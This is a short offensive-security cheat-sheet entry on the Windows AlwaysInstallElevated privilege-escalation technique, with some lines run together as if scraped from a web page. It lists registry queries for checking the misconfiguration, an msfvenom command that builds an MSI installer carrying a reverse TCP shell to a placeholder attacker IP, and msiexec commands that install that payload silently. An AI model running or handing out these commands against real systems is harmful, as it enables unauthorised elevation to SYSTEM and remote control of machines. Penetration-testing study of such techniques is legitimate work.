AlwaysInstallElevated
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installermsfvenom -p windows/x64/shell_reverse_tcp lhost=[attacker_ip] lport=[port] -f msi -o malicious.msiC:\> msiexec /quiet /qn /i [path_to_msi_file]
# eg.
C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msiLast updated